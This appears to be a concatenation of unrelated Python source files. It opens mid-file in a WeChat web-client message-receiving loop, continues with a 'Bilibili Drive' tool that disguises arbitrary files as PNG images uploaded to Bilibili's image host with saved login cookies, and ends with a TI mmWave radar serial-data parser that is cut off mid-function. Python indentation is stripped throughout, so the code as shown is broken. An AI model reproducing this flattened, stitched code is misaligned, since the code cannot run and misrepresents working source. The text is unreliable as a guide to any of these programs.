'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
pass
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList:
self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
chatroomMsg['User'] = self.loginInfo['User']
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except requests.exceptions.ReadTimeout:
pass
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
        maintainThread.daemon = True
maintainThread.start()
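# Long-poll the synccheck endpoint; returns the selector string on success, '2' for a known
# BadStatusLine quirk, or None on an unexpected retcode (which makes the receive loop stop).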
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
try:
r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT)
except requests.exceptions.ConnectionError as e:
try:
if not isinstance(e.args[0].args[1], BadStatusLine):
raise
# will return a package with status '0 -'
# and value like:
# 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93
# seems like status of typing, but before I make further achievement code will remain like this
return '2'
except:
raise
r.raise_for_status()
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
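# Fetch new messages and contact updates via webwxsync and refresh the stored SyncKey.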
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.isLogging = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
main.py
|
#!/usr/bin/env python3.7
# -*- coding: utf-8 -*-
import hashlib
import json
import math
import os
import re
import requests
import shlex
import signal
import struct
import sys
import threading
import time
import types
from PIL import Image
from io import BytesIO
from bilibili import Bilibili
#from picture import Encoder
bundle_dir = os.path.dirname(sys.executable) if getattr(sys, "frozen", False) else os.path.dirname(os.path.abspath(__file__))
default_url = lambda sha1: f"http://i0.hdslb.com/bfs/album/{sha1}.png"
meta_string = lambda url: ("bd:pg:" + re.findall(r"[a-fA-F0-9]{40}", url)[0]) if re.match(r"^http(s?)://i0.hdslb.com/bfs/album/[a-fA-F0-9]{40}.png$", url) else url
size_string = lambda byte: f"{byte / 1024 / 1024 / 1024:.2f} GB" if byte > 1024 * 1024 * 1024 else f"{byte / 1024 / 1024:.2f} MB" if byte > 1024 * 1024 else f"{byte / 1024:.2f} KB" if byte > 1024 else f"{int(byte)} B"
def log(message):
print(f"[{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}] {message}")
def encode_png(data):
minw = 2048
minh = 1080
dep = 3
mode = 'RGB'
data = struct.pack('<I', len(data)) + data
minsz = minw * minh * dep
if len(data) < minsz:
data = data + b'\0' * (minsz - len(data))
rem = len(data) % (minw * dep)
if rem != 0:
data = data + b'\0' * (minw * dep - rem)
hei = len(data) // (minw * dep)
img = Image.frombytes(mode, (minw, hei), data)
bio = BytesIO()
img.save(bio, 'png')
return bio.getvalue()
def calc_sha1(data, hexdigest=False):
sha1 = hashlib.sha1()
if isinstance(data, types.GeneratorType):
for chunk in data:
sha1.update(chunk)
else:
sha1.update(data)
return sha1.hexdigest() if hexdigest else sha1.digest()
def read_in_chunk(file_name, chunk_size=16 * 1024 * 1024, chunk_number=-1):
chunk_counter = 0
with open(file_name, "rb") as f:
while True:
data = f.read(chunk_size)
if data != b"" and (chunk_number == -1 or chunk_counter < chunk_number):
yield data
chunk_counter += 1
else:
return
def read_history(dirs,file):
try:
with open(os.path.join(dirs, file), "r", encoding="utf-8") as f:
history = json.loads(f.read())
except:
history = {}
return history
def get_file(root_path, all_files=None):
    # recursively collect all file paths under root_path (Windows-style separators)
    if all_files is None:
        all_files = []  # avoid the mutable-default-argument pitfall
    for file in os.listdir(root_path):
        if not os.path.isdir(root_path + '\\' + file):  # not a dir
            all_files.append(root_path + '\\' + file)
        else:  # is a dir
            get_file(root_path + '\\' + file, all_files)
    return all_files
def login():
bilibili = Bilibili()
username = input("username > ")
password = input("password > ")
if bilibili.login(username, password):
bilibili.get_user_info()
with open(os.path.join(bundle_dir, "cookies.json"), "w", encoding="utf-8") as f:
f.write(json.dumps(bilibili.get_cookies(), ensure_ascii=False, indent=2))
def image_upload(data, cookies):
url = "https://api.vc.bilibili.com/api/v1/drawImage/upload"
headers = {
'Origin': "https://t.bilibili.com",
'Referer': "https://t.bilibili.com/",
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36",
}
files = {
'file_up': (f"{int(time.time() * 1000)}.png", data),
}
data = {
'biz': "draw",
'category': "daily",
}
try:
response = requests.post(url, data=data, headers=headers, cookies=cookies, files=files, timeout=300).json()
except:
response = None
return response
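# Split a local file into fixed-size blocks, encode each block as a PNG and upload it (skipping
# blocks the CDN already has), then upload a JSON meta image listing the block URLs, sizes and
# SHA-1s, and record the result in the local history file.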
def upload(file_name, thread, block_size,folder,write):
def core(index, block):
try:
block_sha1 = calc_sha1(block, hexdigest=True)
full_block = encode_png(block)
full_block_sha1 = calc_sha1(full_block, hexdigest=True)
url = is_skippable(full_block_sha1)
if url:
log(f"分块{index + 1}/{block_num}上传完毕")
block_dict[index] = {
'url': url,
'size': len(block),
'sha1': block_sha1,
}
else:
# log(f"分块{index + 1}/{block_num}开始上传")
for _ in range(10):
if terminate_flag.is_set():
return
response = image_upload(full_block, cookies)
if response:
if response['code'] == 0:
url = response['data']['image_url']
log(f"分块{index + 1}/{block_num}上传完毕")
block_dict[index] = {
'url': url,
'size': len(block),
'sha1': block_sha1,
}
return
elif response['code'] == -4:
terminate_flag.set()
log(f"分块{index + 1}/{block_num}第{_ + 1}次上传失败, 请重新登录")
return
log(f"分块{index + 1}/{block_num}第{_ + 1}次上传失败")
else:
terminate_flag.set()
except:
terminate_flag.set()
finally:
done_flag.release()
def is_skippable(sha1):
url = default_url(sha1)
headers = {
'Referer': "http://t.bilibili.com/",
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36",
}
for _ in range(5):
try:
response = requests.head(url, headers=headers, timeout=13)
return url if response.status_code == 200 else None
except:
pass
return None
def write_history(first_4mb_sha1, meta_dict, url,write):
history = read_history(bundle_dir,write)
history[first_4mb_sha1] = meta_dict
history[first_4mb_sha1]['url'] = url
dirs = os.path.dirname(file_name) if write[-7:]==".bdsync" else bundle_dir
with open(os.path.join(dirs, write), "w", encoding="utf-8") as f:
f.write(json.dumps(history, ensure_ascii=False, indent=2))
start_time = time.time()
if not os.path.exists(file_name):
log(f"文件{file_name}不存在")
return None
if os.path.isdir(file_name):
log("上传文件夹请至uploadall")
return None
log(f"上传: {os.path.basename(file_name)} ({size_string(os.path.getsize(file_name))})")
    if os.path.getsize(file_name) <= 80 * 1024 * 1024:  # <= 80 MB
        if block_size == 0: block_size = 4
        if thread == 0: thread = 8
    if 80 * 1024 * 1024 < os.path.getsize(file_name) <= 500 * 1024 * 1024:  # <= 500 MB
        if block_size == 0: block_size = 8
        if thread == 0: thread = 8
    if os.path.getsize(file_name) > 500 * 1024 * 1024:
        if block_size == 0: block_size = 16
        if thread == 0: thread = 8
first_4mb_sha1 = calc_sha1(read_in_chunk(file_name, chunk_size=4 * 1024 * 1024, chunk_number=1), hexdigest=True)
history = read_history(bundle_dir,"history.json") if write[-7:]!=".bdsync" else read_history(os.path.dirname(file_name),write)
if first_4mb_sha1 in history:
url = history[first_4mb_sha1]['url']
log(f"文件已于{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(history[first_4mb_sha1]['time']))}上传, 共有{len(history[first_4mb_sha1]['block'])}个分块")
log(f"META URL -> {meta_string(url)}")
return url
try:
with open(os.path.join(bundle_dir, "cookies.json"), "r", encoding="utf-8") as f:
cookies = json.loads(f.read())
except:
log("Cookies加载失败, 请先登录")
return None
log(f"线程数: {thread}")
done_flag = threading.Semaphore(0)
terminate_flag = threading.Event()
thread_pool = []
block_dict = {}
block_num = math.ceil(os.path.getsize(file_name) / (block_size * 1024 * 1024))
log(f"分块大小: {block_size} MB")
log(f"分块数: {block_num}")
for index, block in enumerate(read_in_chunk(file_name, chunk_size=block_size * 1024 * 1024)):
if len(thread_pool) >= thread:
done_flag.acquire()
if not terminate_flag.is_set():
thread_pool.append(threading.Thread(target=core, args=(index, block)))
thread_pool[-1].start()
else:
log("已终止上传, 等待线程回收")
break
    for t in thread_pool:  # avoid shadowing the 'thread' parameter
        t.join()
if terminate_flag.is_set():
return None
sha1 = calc_sha1(read_in_chunk(file_name), hexdigest=True)
fn = os.path.abspath(file_name) if folder else os.path.basename(file_name)
meta_dict = {
'time': int(time.time()),
'filename': fn,
'size': os.path.getsize(file_name),
'sha1': sha1,
'block': [block_dict[i] for i in range(len(block_dict))],
}
meta = json.dumps(meta_dict, ensure_ascii=False).encode("utf-8")
full_meta = encode_png(meta)
for _ in range(10):
response = image_upload(full_meta, cookies)
if response and response['code'] == 0:
url = response['data']['image_url']
log("元数据上传完毕")
log(f"{meta_dict['filename']} ({size_string(meta_dict['size'])}) 上传完毕, 用时{time.time() - start_time:.1f}秒, 平均速度{size_string(meta_dict['size'] / (time.time() - start_time))}/s")
log(f"META URL -> {meta_string(url)}")
write_history(first_4mb_sha1, meta_dict, url,write)
return url
log(f"元数据第{_ + 1}次上传失败")
else:
return None
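# Reverse of encode_png: read the 4-byte length prefix from the image's raw pixel bytes and
# return exactly that many payload bytes.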
def decode_png(data):
img = Image.open(BytesIO(data))
data = img.tobytes()
sz = struct.unpack('<I', data[:4])[0]
data = data[4:4+sz]
return data
def image_download(url):
headers = {
'Referer': "http://t.bilibili.com/",
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36",
}
content = []
last_chunk_time = None
try:
for chunk in requests.get(url, headers=headers, timeout=10, stream=True).iter_content(128 * 1024):
if last_chunk_time is not None and time.time() - last_chunk_time > 5:
return None
content.append(chunk)
last_chunk_time = time.time()
return b"".join(content)
except:
return None
def fetch_meta(string):
try:
sha1 = re.search(r"[a-fA-F0-9]{40}", string)
full_meta = image_download(f"http://i0.hdslb.com/bfs/album/{sha1.group(0)}.png")
meta_dict = json.loads(decode_png(full_meta).decode("utf-8"))
return meta_dict
except:
return None
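# Rebuild a file from its meta: download every needed block image, strip the PNG wrapper,
# verify each block's SHA-1, write it at the right offset, and finally check the whole-file
# SHA-1 against the meta.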
def download(meta, file, thread, folder):
def core(index, block_dict):
try:
# log(f"分块{index + 1}/{len(meta_dict['block'])}开始下载")
for _ in range(10):
if terminate_flag.is_set():
return
block = image_download(block_dict['url'])
if block:
block = decode_png(block)
if calc_sha1(block, hexdigest=True) == block_dict['sha1']:
file_lock.acquire()
f.seek(block_offset(index))
f.write(block)
file_lock.release()
log(f"分块{index + 1}/{len(meta_dict['block'])}下载完毕")
return
else:
log(f"分块{index + 1}/{len(meta_dict['block'])}校验未通过")
else:
log(f"分块{index + 1}/{len(meta_dict['block'])}第{_ + 1}次下载失败")
else:
terminate_flag.set()
except:
terminate_flag.set()
finally:
done_flag.release()
def block_offset(index):
return sum(meta_dict['block'][i]['size'] for i in range(index))
def is_overwritable(file_name):
return (input("文件已存在, 是否覆盖? [y/N] ") in ["y", "Y"])
start_time = time.time()
meta_dict = fetch_meta(meta)
if meta_dict:
if ('end' in meta_dict):
downloadall("","",meta)
return None
else:
file_name = file if file else meta_dict['filename']
log(f"下载: {os.path.basename(file_name)} ({size_string(meta_dict['size'])}), 共有{len(meta_dict['block'])}个分块, 上传于{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(meta_dict['time']))}")
else:
log("元数据解析失败")
return None
log(f"线程数: {thread}")
download_block_list = []
if os.path.exists(file_name):
if os.path.getsize(file_name) == meta_dict['size'] and calc_sha1(read_in_chunk(file_name), hexdigest=True) == meta_dict['sha1']:
log("文件已存在, 且与服务器端内容一致")
return file_name
elif is_overwritable(file_name):
with open(file_name, "rb") as f:
for index, block_dict in enumerate(meta_dict['block']):
f.seek(block_offset(index))
if calc_sha1(f.read(block_dict['size']), hexdigest=True) == block_dict['sha1']:
# log(f"分块{index + 1}/{len(meta_dict['block'])}校验通过")
pass
else:
# log(f"分块{index + 1}/{len(meta_dict['block'])}校验未通过")
download_block_list.append(index)
log(f"{len(download_block_list)}/{len(meta_dict['block'])}个分块待下载")
else:
return None
else:
download_block_list = list(range(len(meta_dict['block'])))
done_flag = threading.Semaphore(0)
terminate_flag = threading.Event()
file_lock = threading.Lock()
thread_pool = []
if folder :
        if not os.path.exists(os.path.dirname(file_name)):  # downloading a file whose directory structure is being restored
os.makedirs(os.path.dirname(file_name))
with open(file_name, "r+b" if os.path.exists(file_name) else "wb") as f:
for index in download_block_list:
if len(thread_pool) >= thread:
done_flag.acquire()
if not terminate_flag.is_set():
thread_pool.append(threading.Thread(target=core, args=(index, meta_dict['block'][index])))
thread_pool[-1].start()
else:
log("已终止下载, 等待线程回收")
break
    for t in thread_pool:  # avoid shadowing the 'thread' parameter
        t.join()
if terminate_flag.is_set():
return None
f.truncate(sum(block['size'] for block in meta_dict['block']))
log(f"{os.path.basename(file_name)} ({size_string(meta_dict['size'])}) 下载完毕, 用时{time.time() - start_time:.1f}秒, 平均速度{size_string(meta_dict['size'] / (time.time() - start_time))}/s")
sha1 = calc_sha1(read_in_chunk(file_name), hexdigest=True)
if sha1 == meta_dict['sha1']:
log("文件校验通过")
return file_name
else:
log("文件校验未通过")
return None
def uploadall(path):
def write_history(first_4mb_sha1, meta_dict, url, write):
history = read_history(bundle_dir,write)
history[first_4mb_sha1] = meta_dict
if url:
history[first_4mb_sha1]['url'] = url
with open(os.path.join(bundle_dir, write), "w", encoding="utf-8") as f:
f.write(json.dumps(history, ensure_ascii=False, indent=2))
if not os.path.exists(path):
print("目录不存在")
return None
torrent = f"upload-{time.strftime('%Y%m%d-%H%M%S', time.localtime(time.time()))}.bd"
with open(os.path.join(bundle_dir, torrent), "a", encoding="utf-8") as f:
f.write(json.dumps({}, ensure_ascii=False, indent=2))
index = 0
files_num = len(get_file(path,[]))
for i in get_file(path,[]):
index += 1
log(f"=== 正在上传 {index}/{files_num} {i} ===")
upload(i,0,0,True,torrent)
    # upload the meta that records the whole encoded data set
try:
with open(os.path.join(bundle_dir, "cookies.json"), "r", encoding="utf-8") as f:
cookies = json.loads(f.read())
except:
log("Cookies加载失败, 请先登录")
return None
end = {
'time': int(time.time()),
'root_path': path,
'files_num': files_num
}
write_history('end',end,"",torrent)
meta = json.dumps(read_history(bundle_dir,torrent), ensure_ascii=False).encode("utf-8")
full_meta = encode_png(meta)
for _ in range(10):
response = image_upload(full_meta, cookies)
if response and response['code'] == 0:
url = response['data']['image_url']
log("所有文件元数据上传完毕")
log(f"META URL -> {meta_string(url)}")
write_history('end',end,url,torrent)
return url
log(f"元数据第{_ + 1}次上传失败")
else:
return None
def downloadall(jsonfile,bdfile,meta):
if jsonfile:
if not os.path.exists(jsonfile):
print('无history.json文件')
return None
else:
if not os.path.exists(bundle_dir + "\\download"):
os.makedirs(bundle_dir + "\\download")
os.chdir(bundle_dir + "\\download")
with open(os.path.join(jsonfile), "r", encoding="utf-8") as f:
history = json.loads(f.read())
num = 0
for i in history :
num += 1
file = history[i]["filename"]
log(f"=== 正在下载 {num}/{len(history)} {file} ===")
download(history[i]["url"],file,8,False)
elif bdfile:
if not os.path.exists(bdfile):
print('无upload.bd文件')
return None
else:
with open(os.path.join(bdfile), "r", encoding="utf-8") as f:
history = json.loads(f.read())
num = 0
for i in history :
num += 1
if i=="end": return None
file = history[i]["filename"]
file = file.replace(os.path.dirname(os.path.dirname(history["end"]["root_path"])),"")
log(f"=== 正在下载 {num}/{len(history)-1} {file} ===")
download(history[i]["url"],file,8,True)
elif meta:
history = fetch_meta(meta)
num = 0
for i in history :
num += 1
if i=="end": return None
file = history[i]["filename"]
file = file.replace(os.path.dirname(os.path.dirname(history["end"]["root_path"])),"")
log(f"=== 正在下载 {num}/{len(history)-1} {file} ===")
download(history[i]["url"],file,8,True)
def basemeta():
meta = input("meta > ")
sha1 = re.search(r"[a-fA-F0-9]{40}", meta)
meta_dict = fetch_meta(meta)
txt = f"{sha1.group(0)}.txt"
with open(os.path.join(bundle_dir, f"{sha1.group(0)}.txt"), "w", encoding="utf-8") as f:
f.write(json.dumps(meta_dict, ensure_ascii=False, indent=2))
print(f"元数据导出到 {sha1.group(0)}.txt ")
def output():
file = input("history_file > ")
if file:
try:
with open(os.path.join(file), "r", encoding="utf-8") as f:
history = json.loads(f.read())
except:
history = {}
else:
history = read_history(bundle_dir,"history.json")
if history:
txt = f"history-{time.strftime('%Y%m%d-%H%M%S', time.localtime(time.time()))}.txt"
for meta_dict in history:
with open(os.path.join(bundle_dir, txt), "a", encoding="utf-8") as f:
f.write(f"文件名: {history[meta_dict]['filename']}\n")
f.write(f"大小: {size_string(history[meta_dict]['size'])}\n")
f.write(f"SHA-1: {history[meta_dict]['sha1']}\n")
f.write(f"上传时间: {time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(history[meta_dict]['time']))}\n")
f.write(f"分块数: {len(history[meta_dict]['block'])}\n")
f.write(f"分块大小:{size_string(history[meta_dict]['block'][0]['size'])}\n")
f.write(f"META URL -> {meta_string(history[meta_dict]['url'])}\n")
f.write(f"\n")
f.write(f"\n")
print(f"导出完成")
else:
print(f"暂无历史记录")
def syncup(path):
for i in get_file(path,[]):
if i[-7:]!=".bdsync":
log(f"=== 正在上传 {os.path.basename(i)} ===")
upload(i,0,0,False,f"{os.path.basename(i)}.bdsync")
os.system('attrib +h ' + f'"{i}.bdsync"')
def syncdel(path):
for i in get_file(path,[]):
history = read_history(os.path.dirname(i),f"{(os.path.basename(i))}.bdsync")
for j in history:
if history[j]["sha1"] == calc_sha1(read_in_chunk(i), hexdigest=True) :
os.remove(i)
log(f"释放文件 {(os.path.basename(i))}")
else:
log(f"改动的文件 {(os.path.basename(i))}")
def syncdown(path):
for i in get_file(path,[]):
if i[-7:]==".bdsync":
history = read_history(os.path.dirname(i),f"{(os.path.basename(i))}")
for j in history:
os.chdir(os.path.dirname(i))
download(history[j]["url"],"",8,False)
def main():
print("Welcome to Bilibili Drive")
print("软件交流QQ群 ⁹²⁷²⁵⁶⁰⁹⁰")
print()
print("login 登录哔哩哔哩")
print("upload 上传单个文件")
print("download 下载单个文件")
print("uploadall 批量上传文件")
print("downloadall 批量下载文件")
print("info 查看数据信息")
print("output 导出历史记录")
print("syncup 上传同步文件")
print("syncdel 清理同步文件")
print("syncdown 下载同步文件")
while True:
action = input("BiliDrive > ")
if action == "login":
login()
if action == "upload":
file_name = input("filename > ")
thread = input("thread > ")
thread = 0 if thread=="" else int(thread)
block_size = input("block_size(MB) > ")
block_size = 0 if block_size=="" else int(block_size)
upload(file_name,thread,block_size,False,"history.json")
if action == "uploadall":
path = input("folder_path > ")
uploadall(path)
if action == "download":
meta = input("meta > ")
file = input("rename > ")
thread = input("thread > ")
thread = 8 if thread=="" else int(thread)
download(meta, file, thread, False)
if action == "downloadall":
print("history_file,bd_file,meta三选一")
jsonfile = input("history_file > ")
bdfile = input("bd_file > ")
meta = input("meta > ")
downloadall(jsonfile,bdfile,meta)
if action == "info":
basemeta()
if action == "output":
output()
if action == "syncup":
folder = input("folder > ")
syncup(folder)
if action == "syncdel":
folder = input("folder > ")
if (input("原始文件将被删除,确认吗? [y/N] ") in ["y", "Y"]) :
syncdel(folder)
if action == "syncdown":
folder = input("folder > ")
syncdown(folder)
if action == "exit":
exit()
if __name__ == '__main__':
main()
|
x8_mmw.py
|
#
# Copyright (c) 2020, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# TI IWR6843 ES2.0 @ mmWave SDK demo of SDK 3.4.0.3
# TI IWR1843 ES1.0 @ mmWave SDK demo of SDK 3.4.0.3
#
import sys
import json
import serial
import threading
from lib.shell import *
from lib.helper import *
from lib.utility import *
# ------------------------------------------------
_meta_ = {
'mss': 'MMW Demo',
'dev': ('xWR18xx', 'xWR68xx',),
'ver': ('03.04.00.03', '03.05.00.04',),
'cli': 'mmwDemo:/>',
'seq': b'\x02\x01\x04\x03\x06\x05\x08\x07',
'blk': 32,
'aux': 921600,
'ant': (4, 3),
'app': {
'logMagRange': ('plot_range_profile', ), # 'capture_range_profile'),
'noiseProfile': ('plot_range_profile', ),
'detectedObjects': (), # ('plot_detected_objects', 'simple_cfar_clustering'),
'rangeAzimuthHeatMap': ('plot_range_azimuth_heat_map', ),
'rangeDopplerHeatMap': ('plot_range_doppler_heat_map', )
}
}
# ------------------------------------------------
apps = {}
verbose = False
# ------------------------------------------------
def _read_(dat, target=sys.stdout):
target.write(dat)
target.flush()
for ver in _meta_['ver']:
for dev in _meta_['dev']:
if all((tag in dat for tag in (dev, _meta_['mss'], ver))):
return dev # reset detected
if _meta_['cli'] in dat: return (None,) # cli ready
return () # unknown state
def _init_(prt, dev, cfg, dat):
aux = serial.Serial(dat, _meta_['aux'], timeout=0.01)
taux = threading.Thread(target=_data_, args=(aux,))
taux.start()
def _conf_(cfg):
global verbose
c = dict(cfg)
p = {'loglin': float('nan'), 'fftcomp': float('nan'), 'rangebias': float('nan')}
if '_comment_' in c:
c.pop('_comment_', None) # remove entry
if '_settings_' in c:
rx_ant = int(c['_settings_']['rxAntennas'])
tx_ant = int(c['_settings_']['txAntennas'])
# common
if c['channelCfg']['rxMask'] is None:
c['channelCfg']['rxMask'] = 2**rx_ant - 1
if c['channelCfg']['txMask'] is None:
n = tx_ant
if n == 1: n = 0
else: n = 2 * n
c['channelCfg']['txMask'] = 1 + n
if c['channelCfg']['cascading'] is None:
c['channelCfg']['cascading'] = 0 # always 0
# range bias for post-processing
if 'rangeBias' not in c['_settings_'] or c['_settings_']['rangeBias'] is None:
c['_settings_']['rangeBias'] = 0
# range bias for pre-processing
if 'compRangeBiasAndRxChanPhase' in c:
if c['compRangeBiasAndRxChanPhase']['rangeBias'] is None:
c['compRangeBiasAndRxChanPhase']['rangeBias'] = c['_settings_']['rangeBias']
if c['compRangeBiasAndRxChanPhase']['phaseBias'] is None or \
type(c['compRangeBiasAndRxChanPhase']['phaseBias']) == list and \
len(c['compRangeBiasAndRxChanPhase']['phaseBias']) == 0:
c['compRangeBiasAndRxChanPhase']['phaseBias'] = [1, 0] * _meta_['ant'][0] * _meta_['ant'][1]
# cli output
if 'verbose' in c['_settings_'] and c['_settings_']['verbose'] is not None:
verbose = c['_settings_']['verbose']
if c['dfeDataOutputMode']['type'] is None:
c['dfeDataOutputMode']['type'] = 1 # legacy (no subframes)
if c['adcCfg']['adcBits'] is None:
c['adcCfg']['adcBits'] = 2 # 16 bit
log_lin_scale = 1.0 / 512
if num_tx_elev_antenna(c) == 1: log_lin_scale = log_lin_scale * 4.0 / 3 # MMWSDK-439
fft_scale_comp_1d = fft_doppler_scale_compensation(32, num_range_bin(c))
    fft_scale_comp_2d = 1
fft_scale_comp = fft_scale_comp_2d * fft_scale_comp_1d
p['log_lin'], p['fft_comp'], p['range_bias'] = log_lin_scale, fft_scale_comp, c['_settings_']['rangeBias']
c.pop('_settings_', None) # remove entry
return c, p
def _proc_(cfg, par, err={1: 'miss', 2: 'exec', 3: 'plot'}):
global apps
for _, app in apps.items(): app.kill()
apps.clear()
for cmd, app in _meta_['app'].items():
if type(app) not in (list, tuple): app = (app,)
for item in app:
if cmd in cfg['guiMonitor'] and cfg['guiMonitor'][cmd] == 1 and item is not None:
if item not in apps:
apps[item], values = exec_app(item, (cfg, par, ))
if values is None: values = []
code = apps[item].poll()
if code is None:
print_log(item, values)
tapp = threading.Thread(target=_grab_, args=(item,))
tapp.start()
else:
print_log(item, values, RuntimeError(err[code]))
def _pipe_(dat):
for tag in apps:
if apps[tag] is None: continue
try:
apps[tag].stdin.write(str.encode(dat + '\n'))
apps[tag].stdin.flush()
except Exception as e:
print_log(e, sys._getframe(), tag)
apps[tag].kill()
apps[tag] = None
def _grab_(tag):
try:
while True:
line = apps[tag].stderr.readline()
if line:
line = line.decode('latin-1')
print_log(None, tag, line.strip())
except:
pass
# ------------------------------------------------
def _data_(prt): # observe auxiliary port and process incoming data
if not prt.timeout:
raise TypeError('no timeout for serial port provided')
input, output, sync, size = {'buffer': b''}, {}, False, _meta_['blk']
while True:
try:
data = prt.read(size)
input['buffer'] += data
if data[:len(_meta_['seq'])] == _meta_['seq']: # check for magic sequence
if len(output) > 0:
plain = json.dumps(output)
_pipe_(plain)
if verbose:
print(plain, file=sys.stdout, flush=True) # just print output to stdout
input['buffer'] = data
input['blocks'] = -1
input['address'] = 0
input['values'] = 0
input['other'] = {}
output = {}
sync = True # very first frame in the stream was seen
if sync:
flen = 0
while flen < len(input['buffer']): # keep things finite
flen = len(input['buffer'])
aux_buffer(input, output) # do processing of captured bytes
except serial.serialutil.SerialException:
return # leave thread
except Exception as e:
print_log(e, sys._getframe())
# ------------------------------------------------
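# Incremental parser for the demo's TLV output stream: 'address' is the TLV type currently being
# consumed, 'values' how many items are still expected for it, and 'blocks' how many TLV segments
# remain in the current frame; parsed results accumulate in 'output' under the names in 'indices'.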
def aux_buffer(input, output, head=40, indices={
1: 'detected_points', 2: 'range_profile', 3: 'noise_profile',
4: 'azimuth_static', 5: 'range_doppler', 6: 'stats', 7: 'side_info'}):
def aux_head(dat, n=head):
m = dat[ 0: 8] # magic
v = intify(dat[ 8:12], 10) # version
l = intify(dat[12:16]) # length
d = intify(dat[16:20], 10) # platform
f = intify(dat[20:24]) # frame number
t = intify(dat[24:28]) # cpu cycles
o = intify(dat[28:32]) # num objects
        s = intify(dat[32:36]) # segments
u = intify(dat[36: n]) # subframe
return n, v, l, d, f, t, o, s, u
def aux_struct(dat, n=8):
t = intify(dat[ 0: 4])
l = intify(dat[ 4: n])
return n, t, l // 2
def aux_object(dat, oth, n=16): # detected points/objects
x = intify(dat[ 0: 4])
y = intify(dat[ 4: 8])
z = intify(dat[ 8:12])
p = intify(dat[12: n])
if x > 32767: x -= 65536
if y > 32767: y -= 65536
if z > 32767: z -= 65536
qfrac = 0
if 'qfrac' in oth: qfrac = oth['qfrac'] # q-notation is used
x = q_to_dec(x, qfrac)
y = q_to_dec(y, qfrac)
z = q_to_dec(z, qfrac)
return n, p, x, y, z
def aux_profile(dat, n=2): # value of range or noise profile
v = intify(dat[ 0: n])
return n, v
def aux_heatmap(dat, sgn, n=2): # value for heatmaps
v = intify(dat[ 0: n])
if sgn and v > 32767: v -= 65536
return n, v
def aux_info(dat, n=24): # performance measures and statistical data
ifpt = intify(dat[ 0: 4])
tot = intify(dat[ 4: 8])
ifpm = intify(dat[ 8:12])
icpm = intify(dat[12:16])
afpl = intify(dat[16:20])
ifpl = intify(dat[20: n])
return n, ifpt, tot, ifpm, icpm, afpl, ifpl
# ----------
buffer, blocks, address, values, other = \
input['buffer'], input['blocks'], input['address'], input['values'], input['other']
def progress(n, block, value):
nonlocal buffer, values, address
buffer = buffer[n:]
values -= 1
if values == 0: address = 0
try:
output[block].append(value)
except:
try:
output[block][value[0]] = value[1]
except:
output[block] = value
# ----------
# 7) point cloud side info
while address == 7 and len(buffer) >= 4 and values > 0:
buffer = buffer[4:] # TODO
values -= 1
if values == 0: address = 0
